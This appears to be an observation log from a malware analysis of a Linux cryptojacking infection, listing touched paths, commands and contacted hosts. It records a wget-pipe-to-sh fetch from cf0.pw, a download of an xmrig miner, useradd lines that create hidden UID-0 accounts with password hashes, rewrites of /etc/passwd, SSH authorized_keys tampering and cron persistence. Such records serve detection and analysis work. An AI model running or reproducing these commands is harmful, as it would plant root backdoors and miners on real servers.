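Technical Information (observed during analysis: file paths touched, commands executed, and network endpoints contacted; parts of some addresses and hostnames are masked with `#`)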
- /etc/cron.hourly/1
- /etc/cron.hourly/.placeholder
- /etc/cron.hourly/0
- /etc/cron.daily/0
- /etc/cron.weekly/0
- /etc/cron.monthly/0
- /root/.ssh/authorized_keys
- sh -c wget http://cf0.pw/0/etc/cron.hourly/0 -O- 2>/dev/null|sh>/dev/null 2>&1
- wget http://cf0.pw/0/etc/cron.hourly/0 -O-
- sh
- sed -i /^[^:]\+:x:0:/{/^root:/!d} /etc/passwd
- sed -i /^$/d /etc/passwd
- sed -i /^$/d /etc/shadow
- useradd -u 0 -g 0 -o -l -d /root -N -M -p $1$f344a097$L.vnLN/nzsnLirq5nMTBg. sudev
- nscd -i passwd
- nscd -i group
- useradd -u 0 -g 0 -o -l -d /root -N -M -p $1$.bHtz1HY$eNtJowby1b0WVTgQT2bLu/ jewbags
- rm -f /etc/cron.hourly/1
- mkdir -p /root
- mkdir -p /root/.ssh
- wget http://cf0.pw/log/ -O /dev/null
- chmod +x /etc/cron.hourly/0
- chmod +x /etc/cron.daily/0
- chmod +x /etc/cron.weekly/0
- chmod +x /etc/cron.monthly/0
- apt-get install wget curl -y
- /usr/bin/dpkg --print-foreign-architectures
- /usr/lib/apt/methods/http
- pkill -9 xmrig
- grep rbdYSfTEtykGg /root/.ssh/authorized_keys
- mkdir -p /usr/libexec
- chmod 755 /root /root/.ssh /root/.ssh/authorized_keys
- chown root:root /root /root/.ssh /root/.ssh/authorized_keys
- rm -f /usr/libexec/x
- wget http://cf0.pw/0/xmr.tgz -O /usr/libexec/x
- ps auxw
- grep xmrig
- grep -v grep
- tar zxvf x
- gzip -d
- cat /dev/urandom
- tr -dc _A-Za-z0-9
- head -c15
- sed s/c285345992f8ae31/thIZ16p7bmj8I6y/ -i config.json
- ./xmrig
- touch /tmp/sdxsdf
- /bin/sh ./xmrig
- killall -9 xmrig
- /usr/lib/apt/methods/http
- /etc/sed68Pi9e
- /etc/sedfh8r3f
- /etc/sed081S2p
- /etc/passwd+
- /etc/shadow+
- /etc/subuid+
- /etc/subgid+
- /etc/cron.hourly/0
- /etc/cron.daily/0
- /etc/cron.weekly/0
- /etc/cron.monthly/0
- /root
- /root/.ssh
- /root/.ssh/authorized_keys
- /usr/libexec/xmrig-2.4.3/xmrig
- /usr/libexec/xmrig-2.4.3/config.json
- /usr/libexec/xmrig-2.4.3
- /usr/libexec/xmrig-2.4.3/sedp1fY0q
- /root/.ssh
- /usr/libexec
- /usr/libexec/xmrig-2.4.3
- /etc/passwd.lock"
- /etc/group.lock"
- /etc/gshadow.lock"
- /etc/subuid.lock"
- /etc/subgid.lock"
- /etc/shadow.lock"
- /etc/sed68Pi9e
- /etc/sedfh8r3f
- /etc/sed081S2p
- /etc/.pwd.lock
- /etc/passwd.694
- /etc/group.694
- /etc/gshadow.694
- /etc/subuid.694
- /etc/subgid.694
- /etc/shadow.694
- /etc/passwd-
- /etc/passwd+
- /etc/shadow-
- /etc/shadow+
- /etc/subuid-
- /etc/subuid+
- /etc/subgid-
- /etc/subgid+
- /etc/passwd.699
- /etc/group.699
- /etc/gshadow.699
- /etc/subuid.699
- /etc/subgid.699
- /etc/shadow.699
- /etc/ld.so.preload
- /var/lib/dpkg/lock
- /var/cache/apt/archives/lock
- /usr/libexec/x
- /usr/libexec"/xmrig-2.4.3/xmrig
- /usr/libexec/xmrig-2.4.3/xmrig
- /usr/libexec"/xmrig-2.4.3/config.json
- /usr/libexec/xmrig-2.4.3/config.json
- /usr/libexec/xmrig-2.4.3"/sedp1fY0q
- /usr/libexec/xmrig-2.4.3/sedp1fY0q
- /tmp/sdxsdf
- /etc/passwd.694"
- /etc/group.694"
- /etc/gshadow.694"
- /etc/subuid.694"
- /etc/subgid.694"
- /etc/shadow.694"
- /etc/shadow.lock"
- /etc/passwd.lock"
- /etc/group.lock"
- /etc/gshadow.lock"
- /etc/subuid.lock"
- /etc/subgid.lock"
- /etc/passwd.699"
- /etc/group.699"
- /etc/gshadow.699"
- /etc/subuid.699"
- /etc/subgid.699"
- /etc/shadow.699"
- /etc/cron.hourly/1"
- /usr/libexec/x"
- <LOCAL_DNS_SERVER>
- [2#########:1:216:35ff:fe7f:6ceb]:80
- [2#########:0:216:35ff:fe7f:be4f]:80
- [2#######8:dc41:100::233]:80
- 21#.##1.132.32:80
- 21#.##6.149.233:80
- 21#.##1.132.250:80
- cf#.####/etc/cron.hourly/0
- cf#.pw/log/
- ft#.##.######.#####ebian/pool/main/w/wget/wget_1.16-1%2bdeb8u1_i386.deb
- se######.######.######ol/updates/main/c/curl/libcurl3_7.38.0-4%2bdeb8u5_i386.deb
- se######.######.#####ool/updates/main/c/curl/curl_7.38.0-4%2bdeb8u5_i386.deb
- cf#.##/0/xmr.tgz
- cf#.pw
- ft#.##.debian.org
- se####ty.debian.org